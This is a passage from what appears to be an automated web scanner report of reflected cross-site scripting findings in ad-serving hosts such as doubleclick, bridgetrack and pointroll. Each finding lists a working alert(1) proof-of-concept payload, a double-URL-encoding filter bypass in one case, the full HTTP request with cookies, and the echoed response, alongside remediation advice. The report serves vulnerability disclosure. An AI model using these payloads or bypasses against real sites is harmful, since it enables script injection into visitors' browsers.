tp://ad.doubleclick.net/click%3Bh%3Dv8/3b02/7/aa/%2a/m%3B240603520%3B0-0%3B0%3B63480535%3B3454-728/90%3B41067063/41084850/2%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=65285831887867629f05be"-alert(1)-"3b8c2aa8f2c&mt_id=115611&mt_adid=100500&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect=http://www.restaurantfavorites.com/");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
va
...[SNIP]...

2.31. http://ad.doubleclick.net/adj/N2883.6441.USATODAY.COM/B5327539.11 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N2883.6441.USATODAY.COM/B5327539.11

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1665'-alert(1)-'43ef9d0e469 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N2883.6441.USATODAY.COM/B5327539.11;sz=a1665'-alert(1)-'43ef9d0e469 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/stormcenter/default.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 36418
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 15:37:08 GMT
Expires: Mon, 09 May 2011 15:37:08 GMT

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
g=1;v=1;pid=62098467;aid=240223213;ko=0;cid=41821555;rid=41839342;rv=2;rn=2512943;";
this.swfParams = 'ct=US&st=VT&ac=802&zp=05672&bw=4&dma=25&city=17565&src=1762894&rv=2&rid=41839342&=a1665'-alert(1)-'43ef9d0e469&';
this.renderingId = "41839342";
this.previewMode = (("%PreviewMode" == "true") ? true : false);
this.debugEventsMode = (("%DebugEventsMode" == "true")
...[SNIP]...

2.32. http://ads.bridgetrack.com/a/f/ [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bridgetrack.com
Path:   /a/f/

Issue detail

The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79b20%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eab3afffadfe was submitted in the click parameter. This input was echoed as 79b20"><script>alert(1)</script>ab3afffadfe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the click request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /a/f/?BT_CON=200&BT_PID=1559799&r=1748565961&click=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBjmhuQgrITdiEBbK9sQf_qZXkD4OtlZQCs5_thR3AjbcB0PalBBABGAEggqrzDjgAUJOPk9T6_____wFgyYaFiYikhBCgAb3klNsDsgETd3d3LnRoZXJlcHVibGljLmNvbboBCjMwMHgyNTBfYXPIAQnaASBodHRwOi8vd3d3LnRoZXJlcHVibGljLmNvbS9ob21lL7gCGMgC2_zMH6gDAdEDrGtosNr1JsXoA5ID6AO1KugD6QfoA7Mp6AO7KvUDAAAARA%26num%3D1%26sig%3DAGiWqtx_GS7Yu0kL0iNYahi3Cfl6RiqLbQ%26client%3Dca-pub-8560941387472259%26adurl%3D79b20%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eab3afffadfe HTTP/1.1
Host: ads.bridgetrack.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8560941387472259&output=html&h=250&slotname=8504762554&w=300&lmt=1304973456&flash=10.2.154&url=http%3A%2F%2Fwww.therepublic.com%2Fhome%2F&dt=1304955456815&bpp=48&shv=r20110427&jsv=r20110427&correlator=1304955456958&frm=0&adk=3853240141&ga_vid=434740447.1304955454&ga_sid=1304955454&ga_hid=157227490&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=968&ref=http%3A%2F%2Fwww.therepublic.com%2Flogin%2Fprocess%2F&fu=0&ifi=2&dtd=163&xpc=iqVH5Fr9Rv&p=http%3A//www.therepublic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BTA144=; BTA=GUID=4CEEBF00B4224B529E63931FA8A025A6

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sun, 08 May 2011 15:37:47 GMT
Vary: Accept-Encoding
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://ads.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: ASB164=TX=1304955468&D10=&D6=&D8=&D1=&D3=&Pb=104&A=8&SID=15FE115810EC4523BC5C719BDE80E40F&D4=&Vn=1423&Ct=0&Pc=0&D5=&S=&Cn=200&Pd=0&D9=&D2=&T=592093&Cr=70719&D7=&W=72461&Tr=72461&Cp=2248&P=1559799&B=164; expires=Wed, 11-May-2011 04:00:00 GMT; path=/
Set-Cookie: ATV164=62547d163AJSc68c268c1FJ7Nc38c1CFc251VcI26Tcc26ODc8ccc26ODcccccccccccccc; expires=Wed, 11-May-2011 04:00:00 GMT; path=/
Set-Cookie: VCC164=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/
Set-Cookie: BTASES=SID=7186BD565AE2492385F1A401103DFFD5; path=/
Set-Cookie: BTA=GUID=4CEEBF00B4224B529E63931FA8A025A6; expires=Thu, 03-May-2012 04:00:00 GMT; path=/
Date: Mon, 09 May 2011 15:37:47 GMT
Connection: close
Content-Length: 4145

<script language=Javascript src="/ads_v2/script/btwrite.js"></script>
<SCRIPT LANGUAGE=Javascript>function BTAdClick(szURL){window.open(szURL);};var n=navigator;var h="";var fmnv=5;var fmav=10;var btf
...[SNIP]...
YXPIAQnaASBodHRwOi8vd3d3LnRoZXJlcHVibGljLmNvbS9ob21lL7gCGMgC2_zMH6gDAdEDrGtosNr1JsXoA5ID6AO1KugD6QfoA7Mp6AO7KvUDAAAARA&num=1&sig=AGiWqtx_GS7Yu0kL0iNYahi3Cfl6RiqLbQ&client=ca-pub-8560941387472259&adurl=79b20"><script>alert(1)</script>ab3afffadfehttp%3A%2F%2Fads%2Ebridgetrack%2Ecom%2Fads%5Fv2%2Fimg%5Fclick%2F%3FBT%5FBCID%3D316726%26BT%5FSID%3D98461%26" target="_blank">
...[SNIP]...

2.33. http://ads.bridgetrack.com/a/f/ [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bridgetrack.com
Path:   /a/f/

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb598"%3balert(1)//c0e3dd2568c was submitted in the click parameter. This input was echoed as cb598";alert(1)//c0e3dd2568c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/f/?BT_CON=200&BT_PID=1559799&r=1748565961&click=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBjmhuQgrITdiEBbK9sQf_qZXkD4OtlZQCs5_thR3AjbcB0PalBBABGAEggqrzDjgAUJOPk9T6_____wFgyYaFiYikhBCgAb3klNsDsgETd3d3LnRoZXJlcHVibGljLmNvbboBCjMwMHgyNTBfYXPIAQnaASBodHRwOi8vd3d3LnRoZXJlcHVibGljLmNvbS9ob21lL7gCGMgC2_zMH6gDAdEDrGtosNr1JsXoA5ID6AO1KugD6QfoA7Mp6AO7KvUDAAAARA%26num%3D1%26sig%3DAGiWqtx_GS7Yu0kL0iNYahi3Cfl6RiqLbQ%26client%3Dca-pub-8560941387472259%26adurl%3Dcb598"%3balert(1)//c0e3dd2568c HTTP/1.1
Host: ads.bridgetrack.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8560941387472259&output=html&h=250&slotname=8504762554&w=300&lmt=1304973456&flash=10.2.154&url=http%3A%2F%2Fwww.therepublic.com%2Fhome%2F&dt=1304955456815&bpp=48&shv=r20110427&jsv=r20110427&correlator=1304955456958&frm=0&adk=3853240141&ga_vid=434740447.1304955454&ga_sid=1304955454&ga_hid=157227490&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=968&ref=http%3A%2F%2Fwww.therepublic.com%2Flogin%2Fprocess%2F&fu=0&ifi=2&dtd=163&xpc=iqVH5Fr9Rv&p=http%3A//www.therepublic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BTA144=; BTA=GUID=4CEEBF00B4224B529E63931FA8A025A6

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sun, 08 May 2011 15:37:48 GMT
Vary: Accept-Encoding
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://ads.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: ASB164=TX=1304955468&D10=&D6=&D8=&D1=&D3=&Pb=104&A=8&SID=CD678184DD024D26B47E5B1FC3D62359&D4=&Vn=1423&Ct=0&Pc=0&D5=&S=&Cn=200&Pd=0&D9=&D2=&T=592093&Cr=70719&D7=&W=72461&Tr=72461&Cp=2248&P=1559799&B=164; expires=Wed, 11-May-2011 04:00:00 GMT; path=/
Set-Cookie: ATV164=62547d163AJSc68c268c1FJ7Nc38c1CFc251VcI26Tcc26ODc8ccc26ODcccccccccccccc; expires=Wed, 11-May-2011 04:00:00 GMT; path=/
Set-Cookie: VCC164=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/
Set-Cookie: BTASES=SID=F4E325FEC9FF4A6BAEE218756F8E1A14; path=/
Set-Cookie: BTA=GUID=4CEEBF00B4224B529E63931FA8A025A6; expires=Thu, 03-May-2012 04:00:00 GMT; path=/
Date: Mon, 09 May 2011 15:37:47 GMT
Connection: close
Content-Length: 4094

<script language=Javascript src="/ads_v2/script/btwrite.js"></script>
<SCRIPT LANGUAGE=Javascript>function BTAdClick(szURL){window.open(szURL);};var n=navigator;var h="";var fmnv=5;var fmav=10;var btf
...[SNIP]...
YXPIAQnaASBodHRwOi8vd3d3LnRoZXJlcHVibGljLmNvbS9ob21lL7gCGMgC2_zMH6gDAdEDrGtosNr1JsXoA5ID6AO1KugD6QfoA7Mp6AO7KvUDAAAARA&num=1&sig=AGiWqtx_GS7Yu0kL0iNYahi3Cfl6RiqLbQ&client=ca-pub-8560941387472259&adurl=cb598";alert(1)//c0e3dd2568chttp%3A%2F%2Fads%2Ebridgetrack%2Ecom%2Fads%5Fv2%2Fimg%5Fclick%2F%3FBT%5FBCID%3D316726%26BT%5FSID%3D98461%26";var lf="clickTAG=http%3A%2F%2Fgoogleads%2Eg%2Edoubleclick%2Enet%2Faclk%3Fsa%3Dl%26ai%3DBjmhu
...[SNIP]...

2.34. http://ads.bridgetrack.com/a/f/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bridgetrack.com
Path:   /a/f/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f316"-alert(1)-"6f5923542da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/f/?BT_CON=200&BT_PID=1559799&r=1748565961&click=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBjmhuQgrITdiEBbK9sQf_qZXkD4OtlZQCs5_thR3AjbcB0PalBBABGAEggqrzDjgAUJOPk9T6_____wFgyYaFiYikhBCgAb3klNsDsgETd3d3LnRoZXJlcHVibGljLmNvbboBCjMwMHgyNTBfYXPIAQnaASBodHRwOi8vd3d3LnRoZXJlcHVibGljLmNvbS9ob21lL7gCGMgC2_zMH6gDAdEDrGtosNr1JsXoA5ID6AO1KugD6QfoA7Mp6AO7KvUDAAAARA%26num%3D1%26sig%3DAGiWqtx_GS7Yu0kL0iNYahi3Cfl6RiqLbQ%26client%3Dca-pub-8560941387472259%26adurl%3D&9f316"-alert(1)-"6f5923542da=1 HTTP/1.1
Host: ads.bridgetrack.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8560941387472259&output=html&h=250&slotname=8504762554&w=300&lmt=1304973456&flash=10.2.154&url=http%3A%2F%2Fwww.therepublic.com%2Fhome%2F&dt=1304955456815&bpp=48&shv=r20110427&jsv=r20110427&correlator=1304955456958&frm=0&adk=3853240141&ga_vid=434740447.1304955454&ga_sid=1304955454&ga_hid=157227490&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=968&ref=http%3A%2F%2Fwww.therepublic.com%2Flogin%2Fprocess%2F&fu=0&ifi=2&dtd=163&xpc=iqVH5Fr9Rv&p=http%3A//www.therepublic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BTA144=; BTA=GUID=4CEEBF00B4224B529E63931FA8A025A6

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sun, 08 May 2011 15:37:49 GMT
Vary: Accept-Encoding
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://ads.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: ASB164=TX=1304955470&D10=&D6=&D8=&D1=&D3=&Pb=104&A=8&SID=C611BC732A90492BA8B8FFE669900A1F&D4=&Vn=1423&Ct=0&Pc=0&D5=&S=&Cn=200&Pd=0&D9=&D2=&T=592093&Cr=70719&D7=&W=72461&Tr=72461&Cp=2248&P=1559799&B=164; expires=Wed, 11-May-2011 04:00:00 GMT; path=/
Set-Cookie: ATV164=24466d163AJUc68c268c1FJ7Nc38c1CFc251VcI26Tcc26ODc8ccc26ODcccccccccccccc; expires=Wed, 11-May-2011 04:00:00 GMT; path=/
Set-Cookie: VCC164=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/
Set-Cookie: BTASES=SID=A46B821B06334D749A3994F83C6F626A; path=/
Set-Cookie: BTA=GUID=4CEEBF00B4224B529E63931FA8A025A6; expires=Thu, 03-May-2012 04:00:00 GMT; path=/
Date: Mon, 09 May 2011 15:37:49 GMT
Connection: close
Content-Length: 4088

<script language=Javascript src="/ads_v2/script/btwrite.js"></script>
<SCRIPT LANGUAGE=Javascript>function BTAdClick(szURL){window.open(szURL);};var n=navigator;var h="";var fmnv=5;var fmav=10;var btf
...[SNIP]...
7KvUDAAAARA&num=1&sig=AGiWqtx_GS7Yu0kL0iNYahi3Cfl6RiqLbQ&client=ca-pub-8560941387472259&adurl=http%3A%2F%2Fads%2Ebridgetrack%2Ecom%2Fads%5Fv2%2Fimg%5Fclick%2F%3FBT%5FBCID%3D316726%26BT%5FSID%3D98461%269f316"-alert(1)-"6f5923542da=1";var lf="clickTAG=http%3A%2F%2Fgoogleads%2Eg%2Edoubleclick%2Enet%2Faclk%3Fsa%3Dl%26ai%3DBjmhuQgrITdiEBbK9sQf%5FqZXkD4OtlZQCs5%5FthR3AjbcB0PalBBABGAEggqrzDjgAUJOPk9T6%5F%5F%5F%5F%5FwFgyYaFiYikhBCgAb3
...[SNIP]...

2.35. http://ads.pointroll.com/PortalServe/ [r parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the r request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4df7b"%3balert(1)//cbd4ff35fc6 was submitted in the r parameter. This input was echoed as 4df7b";alert(1)//cbd4ff35fc6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=1278576G80420110421221132&time=1|10:39|-5&redir=http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/j%3B240265126%3B0-0%3B0%3B60978287%3B4307-300/250%3B41844694/41862481/1%3B%3B%7Esscs%3D%3f$CTURL$&r=0.6990757603198294df7b"%3balert(1)//cbd4ff35fc6 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/login.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRsl=11042210442417319321424330526S; PRvt=CGJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eotmg43mJ!EQCAeJozEon0qBOtv!FLBCeJpJEothAYwPFAxsCAeJjUEotmZjrmKAEcCDe; PRgo=BCBAAsJvCAAuILDBF-19!BCVBF4FRDVCFUE6; PRimp=D9A20400-E3A0-8979-1309-A36001100200; PRca=|AKLC*1774:2|AKTy*9203:1|AKRD*2017:1|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:12|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#; PRcp=|AKLCAA2c:2|AKTyACY1:1|AKRDAA67:1|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:3|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#; PRpl=|FW9q:1|FW9n:1|FKqE:2|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#; PRcr=|GKwo:2|GLLp:1|GMjB:1|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:3|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#; PRpc=|FW9qGLZC:1|FW9nGLZC:1|FKqEGKwo:2|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 15:39:55 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache

document.write("<iframe id='profr1278576' src='http://ads.pointroll.com/PortalServe/?pid=1278576G80420110421221132&cid=1472985&pos=h&redir=http://ad.doubleclick.net/click%3Bh=v8/3b02/3/0/*/j%3B240265126%3B0-0%3B0%3B60978287%3B4307-300/250%3B41844694/41862481/1%3B%3B~sscs=%3F$CTURL$&time=1|10:39|-5&r=0.6990757603198294df7b";alert(1)//cbd4ff35fc6&server=polRedir' width='300' height='250' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

2.36. http://ads.pointroll.com/PortalServe/ [redir parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45bbf"-alert(1)-"3da21f59ef8 was submitted in the redir parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=1278576G80420110421221132&time=1|10:39|-5&redir=http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/j%3B240265126%3B0-0%3B0%3B60978287%3B4307-300/250%3B41844694/41862481/1%3B%3B%7Esscs%3D%3f$CTURL$45bbf"-alert(1)-"3da21f59ef8&r=0.699075760319829 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/login.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRsl=11042210442417319321424330526S; PRvt=CGJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eotmg43mJ!EQCAeJozEon0qBOtv!FLBCeJpJEothAYwPFAxsCAeJjUEotmZjrmKAEcCDe; PRgo=BCBAAsJvCAAuILDBF-19!BCVBF4FRDVCFUE6; PRimp=D9A20400-E3A0-8979-1309-A36001100200; PRca=|AKLC*1774:2|AKTy*9203:1|AKRD*2017:1|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:12|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#; PRcp=|AKLCAA2c:2|AKTyACY1:1|AKRDAA67:1|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:3|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#; PRpl=|FW9q:1|FW9n:1|FKqE:2|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#; PRcr=|GKwo:2|GLLp:1|GMjB:1|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:3|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#; PRpc=|FW9qGLZC:1|FW9nGLZC:1|FKqEGKwo:2|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 15:39:55 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache

document.write("<iframe id='profr1278576' src='http://ads.pointroll.com/PortalServe/?pid=1278576G80420110421221132&cid=1472985&pos=h&redir=http://ad.doubleclick.net/click%3Bh=v8/3b02/3/0/*/j%3B240265126%3B0-0%3B0%3B60978287%3B4307-300/250%3B41844694/41862481/1%3B%3B~sscs=%3F$CTURL$45bbf"-alert(1)-"3da21f59ef8&time=1|10:39|-5&r=0.699075760319829&server=polRedir' width='300' height='250' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

2.37. http://ads.pointroll.com/PortalServe/ [time parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the time request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8667f"%3balert(1)//4dd79ad4bda was submitted in the time parameter. This input was echoed as 8667f";alert(1)//4dd79ad4bda in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=1278576G80420110421221132&time=1|10:39|-58667f"%3balert(1)//4dd79ad4bda&redir=http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/j%3B240265126%3B0-0%3B0%3B60978287%3B4307-300/250%3B41844694/41862481/1%3B%3B%7Esscs%3D%3f$CTURL$&r=0.699075760319829 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/login.php
